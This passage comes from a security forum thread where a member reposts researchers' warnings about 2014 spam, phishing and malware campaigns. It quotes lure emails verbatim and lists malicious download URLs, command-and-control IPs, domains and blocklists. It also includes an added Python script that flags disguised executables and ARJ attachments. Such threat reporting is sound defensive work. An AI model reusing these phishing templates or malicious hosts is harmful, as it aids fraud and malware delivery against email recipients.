SPAM frauds, fakes, and other MALWARE deliveries...


2072 replies to this topic

#1276 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 11 September 2014 - 05:53 AM

FYI...

Fake job offer SPAM - llcinc .net
- http://blog.dynamoo....-job-offer.html
11 Sep 2014 - "This -fake- company's name looks like it has been designed to be hard to find on Google. The so-called LLC INC using the domain llcinc .net does -not- exist.
    Date:      Wed, 10 Sep 2014 19:51:50 -0400 [09/10/14 19:51:50 EDT]
    From:      LLC INC
    Reply-To:      recruiter@ llcinc .net
    Subject:      EMPLOYMENT OFFER
    Hello,
      Good day to you overthere we will like to inform you that our company is currently
    opening an opportunity for employment if you are interested please do reply with your resume
    to recruiter@ llcinc .net
    Thanks
    Management LLC INC


This so-called job is going to be something like a money mule, parcel mule or some other illegal activity. The domain llcinc .net was registered just a few days ago with -fake- details... There is no website. The email originates from 209.169.222.37, the mail headers indicate that this is probably a compromised email server mail .swsymphony .org.
Avoid."
___

Fake eFax SPAM leads to Cryptowall
- http://blog.dynamoo....cryptowall.html
11 Sep 2014 - "Yet another -fake- eFax spam. I mean really I cannot remember the last time someone sent me a (real) fax...
From:     eFax [message@ inbound .efax .com]
Date:     11 September 2014 20:35
Subject:     eFax message from "unknown" - 1 page(s), Caller-ID: 1-865-537-8935
Fax Message [Caller-ID: 1-865-537-8935
You have received a 1 page fax at Fri, 12 Sep 2014 02:35:44 +0700.
* The reference number for this fax is atl_did1-1400166434-52051792384-154.
Click here to view this fax using your PDF reader.
Please visit www .eFax .com/en/efax/twa/page/help if you have any questions regarding this message or your service.
Thank you for using the eFax service! ...


... the link in the message goes somewhere bad, in this case it downloads a ZIP file from cybercity-game .com/game/Documents.zip which unzips to a malicious executable Documents.scr which has a pretty low VirusTotal detection rate of 2/55*. The ThreatTrack report** clearly identifies this as Cryptowall and identifies that it either downloads data from or posts data... The 111.exe has a much wider detection rate of 22/53*** and according to the ThreatTrack analysis of that binary there is some sort of network connection... I would recommend blocking the following:
"
* https://www.virustot...sis/1410467960/

** http://www.dynamoo.c...20a381ad91f.pdf

*** https://www.virustot...sis/1410468901/
___

Malicious WordPress injection sending to 178.62.254.78 and 176.58.100.98
- http://blog.dynamoo....on-sending.html
11 Sep 2014 - "There is currently some sort of injection attack against WordPress sites that injects code into the site's .js files. Not so unusual.. except that the payload site in the file changes every half hour or so... The site mentioned in the IFRAME is the one that keeps -changing- so presumably there is either something running on the compromised WordPress site, or there is some other mechanism for the bad guys to update the details... All these subdomains are hijacked from legitimate domains using AFRAID.ORG nameservers, and are hosted on 178.62.254.78 (Digital Ocean, Netherlands). These then pass the victim onto another domain in the format... blocking the following IPs may give you better protection:
176.58.100.98
178.62.254.78
"

176.58.100.98: https://www.virustot...98/information/

178.62.254.78: https://www.virustot...78/information/
___

Fake Employee Important Address UPDATE/SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
11 Sep 2014 - "'To All Employee’s –  Important Address UPDATE' which pretends to come from Administrator at your own domain is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     To All Employee’s:
    The end of the year is approaching and we want to ensure every employee receives their W-0 to the correct address. Verify that the address is correct... If changes need to be made, contact HR .. Administrator ...


11 September 2014: Documents.zip: Extracts to: Documents.scr
Current Virus total detections: 0/53* ... another one of the spoofed icon files that, unless you have "show known file extensions" enabled, will look like a proper PDF file instead of the .exe file it really is, making it much more likely for you to accidentally open it and be infected..."
*https://www.virustot...sis/1410456657/

- http://blog.dynamoo....nt-address.html
11 Sep 2014 - "This -fake- HR spam leads to a malicious ZIP file:
From:     Administrator [administrator@ victimdomain .com]
    Date:     11 September 2014 22:25
    Subject:     To All Employee's - Important Address UPDATE
    To All Employee's:The end of the year is approaching and we want to ensure every employee receives their W-5 to the correct address. Verify that the address is correct... If changes need to be made, contact HR...


The link in the email goes to the same site as described in this earlier post*, which means that the payload is Cryptowall."
* http://blog.dynamoo....cryptowall.html
___

Fake picture or video SPAM – jpg malware
- http://myonlinesecur...ke-jpg-malware/
11 Sep 2014 - "'A new picture or video' message pretending to come from getmyphoto@ vodafone .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The attachment file names are so far all the same and it extracts to a fake windows short cut file .pif. Even setting show file extensions will not show the .pif extension in windows 8 and the unzipped file will look like a genuine windows short cut, so you need to be especially wary and cautious. See below:
> http://myonlinesecur...not-showing.png
The email looks like:
    You have received a picture message from mobile phone number +447586595142 picture
    Please note, the free reply expires three days after the original message is sent from the Vodafone network. Vodafone Service


There is a second version of this email doing the rounds today. Instead of an attachment it has a link to a compromised/ infected/newly created malware pushing site where it automatically tries to download the malware in a zip file.
You have received a picture message from mobile phone number +447557523496 click here to view picture message
Please note, the free reply expires three days after the original message is sent from the Vodafone network. Vodafone Service


... there will be hundreds of different sites. The  zip was 90837744-2014_481427.zip which extracts to 90837744-2014_481427.scr which has the same #  and detection rate as the pif file earlier submitted to virus total*

11 September 2014: IMG_00005_09112014.jpeg.zip : Extracts to:    IMG_00005_09112014.jpeg.pif
Current Virus total detections: 4/53** . This is another one of the spoofed icon files that, unless you have "show known file extensions" enabled, will look like a proper jpg file instead of the .pif (windows shortcut) file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410430034/

** https://www.virustot...sis/1410427007/
___

Fake 'new order' SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
11 Sep 2014 - "'new order' pretending to come from random names at live .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has various subjects, including new order, new invoice, FWD:invoice, FWD Order... The attachment file names are so far all the same and it extracts to a -fake- windows short cut file .pif . Even setting show file extensions will -not- show the .pif extension in windows 8  and the unzipped file will look like a genuine windows short cut, so you need to be especially wary and cautious. See below:
> http://myonlinesecur...not-showing.png
The email looks like:
Warmest regards,
> http://myonlinesecur...9/new-order.png


11 September 2014: 2014.09.11.zip : Extracts to:    2014.09.11.pdf.pif
Current Virus total detections: 4/53* . This is another one of the spoofed icon files that, unless you have "show known file extensions" enabled, will look like a proper PDF file instead of the .pif (windows shortcut) file it really is, making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email..."
* https://www.virustot...sis/1410427007/
 

//


Edited by AplusWebMaster, 11 September 2014 - 08:25 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.



#1277 AplusWebMaster


Posted 12 September 2014 - 03:06 AM

FYI...

Fake Invoice SPAM - contains malicious VBS script
- http://blog.mxlab.eu...ous-vbs-script/
Sep 12, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “[COPIE FACTURE SOCIETE LWS FC-408185] – [LWS INVOICE] 10/09/2014″. This email is sent from the spoofed address “Service clients LWS <noreply@ lws .com>” and has the following body:
S.A.R.L LWS
4, rue galvani
75838 PARIS Cedex 17
Paris le, 10/09/2014
Veuillez trouver en pièce jointe votre facture de référence: facture FC-408185 (Fichier: facture-408185) au format ZIP.
Si vous n’avez pas WinRar (Logiciel permettant de lire les fichiers ZIP) vous pouvez le télécharger ici:
http ://www .rarlab .com/download.htm
Merci pour la confiance que vous nous accordez,
Le service comptabilité LWS ...


The attached ZIP file has the name FACTURE_45871147.zip and contains the 4 kB large file FACTURE_45871147.vbs. The VBS script is in fact encoded to hide its real purpose, but it seems that this script will download other malicious files and will install them on a system in order to infect the computer. The trojan is known as Trojan.Script.Crypt.deehcf or VBS/Dloadr-DVY. At the time of writing, 2 of the 53* AV engines did detect the trojan at Virus Total..."
* https://www.virustot...196a5/analysis/
___

Fake Household Improvement SPAM - Zbot Malware
- https://blog.malware...h-zbot-malware/
Sep 12, 2014 - "... malicious email in circulation at the moment which claims to contain an invoice from a Kitchen Appliance company. According to another recipient of the mail*, the named company is actually a real business entity although there’s no suggestion that they’ve been hacked or otherwise compromised – it seems the scammers just opened up a directory, said “That one” and just started pretending to be them. The mail reads as follows:
Screenshot: https://blog.malware...9/kitchens1.jpg
... The email comes with a .zip attachment, which contains a piece of Malware known as Zbot.  Zeus (aka Zbot) is something to be avoided, as it can lead to banking password theft, form grabbing, keystroke logging and also Ransomware. The zip contains an executable made to look like a Word .doc file, which is a trick as old as the hills yet extremely effective where catching people out is concerned. Telling Windows to display known file extensions will help to avoid this particular pitfall... we detect this as Trojan.Spy.Zbot, and the current Virus Total scores currently clock in at 29/54**...  there’s another mail*** doing the rounds which spoofs the same email address mentioned above, yet claims to be sent from a toiletries company. If you’ve bought any form of kitchen / household upgrade or addition recently and receive mails with zipped invoices, you may not recall exactly who you bought all of your items from. With that in mind, you may wish to have a look at your receipts and bank statements, and – on the off chance the randomly selected company named in the spam mails matches up – give them a call directly to confirm they really did send you something. There’s a good chance they probably didn’t..."
* http://myonlinesecur...rd-doc-malware/

** https://www.virustot...14f73/analysis/

*** http://blog.mxlab.eu...ontains-trojan/
___

Data Breaches and PoS RAM Scrapers
- http://blog.trendmic...s-ram-scrapers/
Sep 11, 2014 - "... Ever since the Target data breach came into the limelight, there has been a constant stream of merchants/retailers publicly disclosing data breach incidents. These data breaches typically involve credit card data theft using PoS RAM scrapers. Early this month, Brian Krebs reported yet another big data breach that involves U.S. retailer Home Depot using a new variant of the BlackPOS PoS RAM scraper. Nearly all Home Depot locations in the US are believed to have been affected and it is speculated this data breach might surpass the Target breach in terms of volume of data stolen. In addition to an increased number of data breaches, 2014 also brings an increase in the number of new PoS RAM scraper families. Our PoS RAM scraper family tree illustrates the evolution as follows:
Evolution of the PoS RAM scraper family
> http://blog.trendmic...Figure-3-01.png
... Of the six new variants discovered in 2014, four were discovered between June and August.
- Soraya – discovered in June and is a Dexter- and ZeuS-inspired malware. In addition to scraping RAM for credit card Tracks 1 and 2 data, it borrows tricks from ZeuS for hooking the NtResumeThread API, and injects itself into all new processes. It also borrows ZeuS’s form-grabbing functionality and hooks the browser’s HTTP POST function. Trend Micro detects Soraya variants as TSPY_SORAYA.A.
- BrutPOS – discovered in July and appears to have borrowed functionality from a BlackPOS variant. It attempts to exploit PoS systems that use weak or default passwords and have open Remote Desktop Protocol (RDP) ports. BrutPOS will brute-force the login:password combinations to gain entry into the system. Trend Micro detects BrutPOS variants as TROJ_TIBRUN.B and TROJ_TIBRUN.SM.
- Backoff – discovered in July, is a successor of Alina. It implements an updated data search function and drops a watchdog process that ensures Backoff is always running on the system. The cybercriminals use publicly available tools to brute-force entry into RDP applications on PoS systems and install Backoff. Trend Micro detects Backoff variants as TSPY_POSLOGR.A, TSPY_POSLOGR.B, and TSPY_POSLOGR.C.
- BlackPOS ver 2.0 – discovered in August, clones the exfiltration technique that the BlackPOS variant used to compromise U.S. retailer Target. BlackPOS ver 2.0 also adds a unique feature where it pretends to be an AV product installed on the system to avoid drawing unwanted attention to itself. Reports indicate that this malware appears to have been used in the latest big data breach targeting Home Depot. Trend Micro detects BlackPOS ver 2.0 variants as TSPY_MEMLOG.A..."
 

:ph34r:  <_<


Edited by AplusWebMaster, 12 September 2014 - 08:44 AM.



#1278 AplusWebMaster


Posted 14 September 2014 - 06:43 PM

FYI...

Phish - Paypal ...
- http://myonlinesecur...-hear-phishing/
14 Sep 2014 - "'Paypal Your account will be limited until we hear from you' pretending to come from service_paypal=cczazmam .com@ wpengine .com; on behalf of; service_paypal@ cczazmam .com. There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card... The original email looks like this. It will NEVER be a genuine email from  PayPal or Your Bank so don’t ever follow the links in the email...
    PayPal account information :
    Hello,
    Dear PayPal user ,
    Your account will be limited if you not confirm it .
    Need Assistance?
    Some information on your account appears to be missing or incorrect.
    Please update your account promptly so that you can continue to enjoy
    all the benefits of your PayPal account.
    If you don’t update your account within 37 days, we’ll limit what you can do with your PayPal account.
    Please Login to confirm your information :
    http ://rangeviewrentals .com//wp-content/themes/twentytwelve/wester.html
    Reference Number: PP-003-211-347-423
    Yours sincerely,
    PayPal


This particular phishing campaign starts with an email with a link. In this case to a hacked compromised website, which looks nothing like any genuine PayPal page:
> http://myonlinesecur...ishing-scam.png
This one wants your personal details, your Paypal account log in details and your credit card and bank details and your email log in details . Many of them are also designed to specifically steal your facebook and other social network log in details..."
 

:ph34r: :ph34r:  <_<




#1279 AplusWebMaster


Posted 15 September 2014 - 04:11 AM

FYI...

Fake Termination SPAM – malware
- http://myonlinesecur...lation-malware/
15 Sep 2014 - "There can’t be a much more alarming email to open first thing on a Monday Morning than one that pretends to say that you have been fired... 'Termination due to policy violation #33205939124' pretending to come from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Today’s email template attaches an arj file. This sort of compressed file is rarely used nowadays and many popular zip file programs will not automatically extract them. -Any- email received with an ARJ attachment should be immediately -deleted-. NO legitimate company or program ever uses that form of compression nowadays. To make it even harder to quickly detect, all the attachments are randomly named and extract to a different randomly named file and each one has a totally different SHA1 or MD5 #. Loads of slightly different subjects with this one, including
    Policy violation #59892665326
    Termination due to policy violation #33205939124
    Termination #59147901198
All the alleged infringements or violations have different numbers... The email looks like:
     Hello,
    We regret to inform you that your employment with A&M Defence & Marine Services Ltd is being terminated. Your termination is the result of the following violations of company policy:
    - 0A4 44 12.09.2011
    - 0A4 46 12.09.2011
    - 0A4 85 12.09.2011
     You were issued written warnings on 19.08.2014. As stated in your final warning, you needed to take steps to correct your behavior by 15.09.2014. Your failure to do so has resulted in your termination. To appeal this termination, you must return written notification of your intention to appeal to Wynona Kinnare in A&M Defence & Marine Services Ltd no later than 06:00PM on 21.09.2014.
     Sincerely,
    Pauletta Stephens ...


15 September 2014: disturbance_2014-09-15_08-38-12_33205939124.arj:
Extracts to:  disturbance_2014-09-15_08-38-12_33205939124.exe
Current Virus total detections: 3/53* . This 'Termination due to policy violation #33205939124' is another one of the spoofed icon files that, unless you have "show known file extensions" enabled, will look like a proper PDF file instead of the .exe file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...4c4ef/analysis/
___

LinkedIn feature exposes Email Addresses
- http://krebsonsecuri...mail-addresses/
Sep 15, 2014 - "One of the risks of using social media networks is having information you intend to share with only a handful of friends be made available to everyone. Sometimes that over-sharing happens because friends betray your trust, but more worrisome are the cases in which a social media platform itself exposes your data in the name of marketing... According to researchers at the Seattle, Wash.-based firm Rhino Security Labs, at the crux of the issue is LinkedIn’s penchant for making sure you’re as connected as you possibly can be. When you sign up for a new account, for example, the service asks if you’d like to check your contacts lists at other online services (such as Gmail, Yahoo, Hotmail, etc.). The service does this so that you can connect with any email contacts that are already on LinkedIn, and so that LinkedIn can send invitations to your contacts who aren’t already users... Rhino Security founders Benjamin Caudill and Bryan Seely have a recent history of revealing how trust relationships between and among online services can be abused to expose or divert potentially sensitive information... In an email sent to this reporter last week, LinkedIn said it was planning at least two changes to the way its service handles user email addresses..."
(More at the krebsonsecurity URL above.)
___

Fake Overdue invoice SPAM - malicious .arj attachment  
- http://blog.dynamoo....0-spam-has.html
15 Sep 2014 - "This -fake- invoice email has a malicious attachment:
    From:     Mauro Reddin
    Date:     15 September 2014 10:32
    Subject:     Overdue invoice #6767390
    Morning,
    I was hoping to hear from you by now. May I have payment on invoice #84819995669 today please, or would you like a further extension?
    Best regards,
    Mauro Reddin ...


The attachment is an archive file invc_2014-09-15_15-07-11_6767390.arj so in order to get infected you would need an application capable of handling ARJ archives. Once unpacked, there is a malicious executable called invc_2014-09-15_15-07-11_88499270.exe which has a VirusTotal detection rate of just 1/55*... recommend that you apply the following blocklist (Long list at the dynamoo URL above.) ..."
* https://www.virustot...sis/1410773681/
___

Fake Sage 'Outdated Invoice' SPAM ...
- http://blog.dynamoo....ce-spam_15.html
15 Sep 2014 - "... another -fake- Sage email leading to malware:

Screenshot: http://4.bp.blogspot.../s1600/sage.png

... This ZIP file contains a malicious executable Invoice18642.scr which has a VirusTotal detection rate of just 1/55*. The ThreatTrack report... shows that it attempts to communicate with the following resources:
188.165.204.210/1509uk1/NODE01/0/51-SP3/0/
188.165.204.210/1509uk1/NODE01/1/0/0/
green-fuel .us/upload/box/1509uk1.ltc
www .green-fuel .us/upload/box/1509uk1.ltc
"
* https://www.virustot...sis/1410779812/
___

Fake 'secure' NatWest SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
15 Sep 2014 - "'You have received a new secure message from NatWest' pretending to come from NatWest <secure@natwest.com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
[ NatWest logo ]
You have a new private message from NatWest
To view/read this your secure message please click here
Email Encryption Provided by NatWest. Learn More.
Email Security Powered by Voltage IBE
Copyright 2014 National Westminster Bank Plc. All rights reserved.
Footer Logo NatWest
To unsubscribe please click here ...

    
15 September 2014: SecureMessage.zip ( 8kb) : Extracts to:   SecureMessage.scr
Current Virus total detections: 1/55* . This 'You have received a new secure message from NatWest' is another one of the spoofed icon files that, unless you have "show known file extensions" enabled, will look like a proper PDF file instead of the .exe file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410779812/

- http://threattrack.t...re-message-spam
Sep 15, 2014
Screenshot: https://gs1.wac.edge...Zu2c1r6pupn.png
___

Phish - LLoyds 'Secure' SPAM...
- http://myonlinesecur...ssage-phishing/
15 Sep 2014 - "There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card, with a message saying something like:
- There have been unauthorised or suspicious attempts to log in to your account, please verify
- Your account has exceeded its limit and needs to be verified
- Your account will be suspended !
- You have received a secure message from < your bank>
- New Secure Message
- We are unable to verify your account information
- Update Personal Information
- Urgent Account Review Notification
- We recently noticed one or more attempts to log in to your PayPal account  from a foreign IP address
- Confirmation of Order
This one is 'LLoyds bank New Secure Message' pretending to come from Eli.Ray@ lloydsbank .com or David.Ricard@ lloydsbank .com... Email looks like:
[ Lloyds TSB logo ]     
    (New users may need to verify their email address)
    If you do not see or cannot click “Read Message” / click here
    Desktop Users:
    You will be prompted to open (view) the file or save (download) it to your computer. For best results, click Read Message button.
    Mobile Users:
    Install the mobile application.
    Protected by the Voltage SecureMail Cloud
    SecureMail has a NEW LOOK to better support mobile devices!
    Disclaimer: This email and any attachments are confidential and for the sole use of the recipients. If you have received this email in error please notify the sender...


Screenshot: http://myonlinesecur...ure_message.png

This one wants your personal details and bank details..."
___

Fake Fax SPAM - malware attachment
- http://myonlinesecur...ke-pdf-malware/
15 Sep 2014 - "'You have received a fax' pretending to come from fax .co.uk <fax@ documents55 .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    You have received a new fax. This fax was received by Fax Server.
    The fax has been downloaded to dropbox service (Google Inc).
    To view your fax message, please download from the link below. It’s
    operated by Dropbox and safety...
    Received Fax Details
    Received on:1 5/09/2014 10:14 AM
    Number of Pages: 1 ...


15 September 2014: Docs0972.zip ( 8kb): Extracts to:  Docs0972.scr
Current Virus total detections: 0/54* . This is another one of the spoofed icon files that, unless you have "show known file extensions" enabled, will look like a proper PDF file instead of the .exe file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410804563/
___

Twitch users shook by money spending malware
- http://www.theinquir...pending-malware
15 Sep 2014 - "... F-Secure has warned gamers that the Twitch video streaming service has been hit with malware that can spend users' money. The firm revealed its concerns in a blog post on Friday*, shining a dark light on the new gaming console darling and its role in the world of Steam. F-Secure said that an alarmed Twitch user - not Amazon - approached it with some concerns, explaining that a lure in the Twitch chat feature offers access to a raffle. We all know what can and usually does follow the clicking an unsolicited link, and that is the start of a one-way trip to malware. This link, which purports to offer gaming gewgaws, is yet another lie, said F-Secure. It explained that a "Twitch-bot" account "bombards" the chat feature and tickles users with its lure..."
More detail here:
* http://www.f-secure....s/00002742.html
 

:ph34r: :ph34r:  <_<


Edited by AplusWebMaster, 15 September 2014 - 02:41 PM.

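As an added example (not from the posts or the blogs quoted above), a small Python triage script for the attachment tricks described in post #1276 and in this post: executables hiding behind a document-like double extension inside a ZIP (.pdf.pif, .jpeg.pif, which Windows 8 shows without the .pif), bare .scr/.exe droppers, and ARJ archives, which the quoted advice says to delete unopened. The attachment and member names are the ones quoted in the thread; their contents are constructed placeholder bytes, and the benign control file is constructed too.

```python
"""Triage e-mail attachments for the lures described in this thread:
executables behind a document-like double extension inside a ZIP
(.pdf.pif, .jpeg.pif), bare .scr/.exe droppers, and ARJ archives.
Added example; file names come from the thread, contents are placeholders.
"""
import io
import os
import zipfile

# Extensions Windows treats as programs. .scr (screensaver) and .pif (program
# information file) run like .exe; Windows 8 never displays .pif, even with
# "show known file extensions" enabled, which is the trick the posts describe.
EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd",
                   ".vbs", ".vbe", ".js", ".jse", ".wsf", ".lnk"}
# The extension a lure wants the victim to believe they are opening.
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx",
                 ".jpg", ".jpeg", ".png", ".txt"}
ARJ_MAGIC = b"\x60\xea"  # every ARJ archive header starts with these two bytes


def classify_name(name):
    """Classify one file name by its real (last) extension.

    Returns 'double_extension' (e.g. 2014.09.11.pdf.pif), 'executable'
    (e.g. Documents.scr) or 'benign'. Only the final suffix decides what
    Windows runs; the inner suffix is what the icon and hidden extension show.
    """
    base = os.path.basename(name.replace("\\", "/")).lower()
    parts = base.split(".")
    if len(parts) < 2:
        return "benign"
    if "." + parts[-1] not in EXECUTABLE_EXTS:
        return "benign"
    if len(parts) >= 3 and "." + parts[-2] in DOCUMENT_EXTS:
        return "double_extension"
    return "executable"


def inspect_attachment(filename, data):
    """Return a list of (finding, member_name) for one attachment.

    ARJ is flagged on magic bytes or name and never unpacked, following the
    thread's advice; ZIPs are listed (not extracted) and each member's name is
    classified; anything else is judged on its own name.
    """
    findings = []
    if data[:2] == ARJ_MAGIC or filename.lower().endswith(".arj"):
        findings.append(("arj_archive", filename))
        return findings
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.is_dir():
                    continue
                verdict = classify_name(info.filename)
                if verdict != "benign":
                    findings.append((verdict, info.filename))
        return findings
    verdict = classify_name(filename)
    if verdict != "benign":
        findings.append((verdict, filename))
    return findings


def triage(attachments):
    """Run inspect_attachment over {name: bytes}; keep only attachments with findings."""
    report = {}
    for name, data in attachments.items():
        findings = inspect_attachment(name, data)
        if findings:
            report[name] = findings
    return report


def build_zip(members):
    """Build an in-memory ZIP from {member_name: bytes} (fixture helper)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for member, content in members.items():
            zf.writestr(member, content)
    return buf.getvalue()


# Constructed sample attachments. The first three names are quoted in the
# thread; the fourth is a constructed benign control. Contents are harmless
# placeholder bytes, not the real payloads.
SAMPLE_ATTACHMENTS = {
    "2014.09.11.zip": build_zip({"2014.09.11.pdf.pif": b"placeholder"}),
    "Documents.zip": build_zip({"Documents.scr": b"placeholder"}),
    "disturbance_2014-09-15_08-38-12_33205939124.arj": ARJ_MAGIC + b"\x00" * 30,
    "quarterly_report.zip": build_zip({"quarterly_report.pdf": b"%PDF-1.4 placeholder"}),
}

if __name__ == "__main__":
    for attachment, findings in triage(SAMPLE_ATTACHMENTS).items():
        for finding, member in findings:
            print(f"{attachment}: {finding} -> {member}")
```

Plugging this into a mail gateway hook (or running it over a quarantine folder) gives a verdict from the real final extension, which is exactly what the Explorer icon and the Windows 8 .pif display hide from the user.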


#1280 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 16 September 2014 - 03:13 AM

FYI...

Fake 'Payments' SPAM ...
- http://blog.mxlab.eu...rding-payments/
Sep 16, 2014 - "... intercepted different campaigns where the trojan Gen:Variant.Graftor.155439 is present in the attached ZIP archive. The trojan is known as Gen:Variant.Graftor.155439 by most AV engines but it’s also known as Trojan/Win32.Zbot, HW32.Paked.1F59, Generic-FAUS!BA7599C952BE or PE:Malware.XPACK-HIE/Heur!1.9C48. The first email comes with the subject “Re: today payment done”, is sent from a spoofed address and has the following body:
    Dear sir,
    Today we have able to remit the total amount of US$ 51,704.97 to your account. Details of our payments are as follows:
    Cont. #41 SPV001/APR/13 US$34,299.13 – 11,748.82 (50% disc. For R008 & R016) =
    Cont. #42 EXSQI013/MAY/13 US$29,154.66
    Total Remittance: US$ 51,704.97
    Attached is the TT copy, check with your bank and let us know when you will proceed with shipment.
    Thank you very much.
    Best regards,
    Me


The attached ZIP file has the name swift copy.zip and contains the swift copy.scr file. At the time of writing, 11 of the 54 AV engines did detect the trojan at Virus Total*...
* https://www.virustot...6c686/analysis/
The second email, with the subject “Re: Balance payment”, is sent from a spoofed address and has the following body:
    The attached TT copy is issued at the request of our customer. The advice is for your reference only.
    Yours faithfully,
    Global Payments and Cash Management
    Bank of America (BOA)
    This is an auto-generated email, please DO NOT REPLY. Any replies to this
    email will be disregarded...


The attached ZIP file has the name original copy.zip and contains the original copy.scr file. At the time of writing, 12 of the 55 AV engines did detect the trojan at Virus Total**..."
** https://www.virustot...c1635/analysis/
___

Fake 'My new photo ;)' SPAM - malware attachment
- http://blog.mxlab.eu...zzor-2o-trojan/
Sep 16, 2014 - "... intercepted a new trojan variant distribution campaign by email with the subject “My new photo ;)”. This email is sent from a spoofed address and has the following short body in very poor English:
    my new photo ;)
    if you like my photo to send me u photo


The attached ZIP file has the name photo.zip; once extracted, a folder named photo is available that contains the 127 kB file photo.exe. The trojan is known as a variant of Trojan.Win32.Swizzor.2!O. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustot...817cb/analysis/
... Behavioural information
TCP connections:
131.253.40.1: https://www.virustot....1/information/
137.254.60.32: https://www.virustot...32/information/
134.170.188.84: https://www.virustot...84/information/
157.56.121.21: https://www.virustot...21/information/
91.240.22.62: https://www.virustot...62/information/
___

Fake USPS SPAM - word doc malware
- http://myonlinesecur...rd-doc-malware/
16 Sep 2014 - "'USPS Postal Notification Service' pretending to come from USPS is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecur...ion-service.png

16 September 2014: Label.zip (82 kb): Extracts to: Label.exe
Current Virus total detections: 20/54* . This USPS Postal Notification Service is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft Word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410841682/
___

Fake 'inovice' SPAM ...
- http://blog.dynamoo....ember-spam.html
16 Sep 2014 - "This spam mis-spells "invoice" in the subject line, and has an .arj file attached that contains a malicious binary.
Example subjects:
inovice 8958508 September
inovice 7682161 September
inovice 4868431 September
inovice 0293991 September
Body text:
This email contains an invoice file attachment


The name of the attachment varies, but is in the format invoice_8958508.arj which contains a malicious executable invoice_38898221_spt.exe which has a VirusTotal detection rate of just 3/54*. The ThreatTrack report...and Anubis report show a series of DGA domains... that are characteristic of Zbot, although none of these domains are currently resolving. If your organisation can -block- .arj files at the mail perimeter then it is probably a good idea to do so."
* https://www.virustot...sis/1410860283/
... Behavioural information
TCP connections:
208.91.197.27: https://www.virustot...27/information/
___

Fake FAX SPAM... again
- http://blog.dynamoo....w-fax-spam.html
16 Sep 2014 - "... a facsimile transmission...
From:     Fax
Date:     16 September 2014 11:05
Subject:     You've received a new fax
New fax at SCAN0204102 from EPSON by ...
Scan date: Tue, 16 Sep 2014 15:35:59 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can download your fax message at: ...
(Google Disk Drive is a file hosting service operated by Google, Inc.) ...


The link is so obviously not anything to do with Google. Clicking on it loads another script from triera .biz.ua/twndcrfbru/zjliqkgppi.js which in turn downloads a ZIP file from www .yerelyonetisim .org.tr/pdf/Message_2864_pdf.zip which has a VirusTotal detection rate of 3/55*. This malware then phones home... Recommended blocklist:
188.165.204.210
brisamarcalcados .com.br
triera .biz.ua
yerelyonetisim .org.tr
ngujungwap .mobi.ps
"
* https://www.virustot...sis/1410862754/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustot...10/information/
198.143.152.226: https://www.virustot...26/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake forgeries 'Copied invoices' SPAM
- http://blog.dynamoo....oices-spam.html
16 Sep 2014 - "Kifilwe Shakong is a real person who works for Cashbuild in South Africa. She is  not the person sending these messages, they are forgeries. Cashbuild's systems have not been compromised in any way. As you might guess, these messages have a malicious attachment.
From:     Kifilwe Shakong [kshakong@ cashbuild .co.za]
Date:     16 September 2014 12:17
Subject:     Copied invoices
The attached invoices are copies. We will not be able to pay them. Please send clear invoices.
This outbound email has been scanned by the IS Mail Control service.
For more information please visit http ...
The attached invoices are copies. We will not be able to pay them. Please send clear invoices...


Attached is a file with a filename in the format SKMBT_75114091015230.zip which in turn contains a malicious executable SKMBT_75114091015230.exe which has a very low detection rate at VirusTotal of just 1/54*... the malware attempts to phone home to the following domains and IPs which are worth blocking:
golklopro .com
94.100.95.109
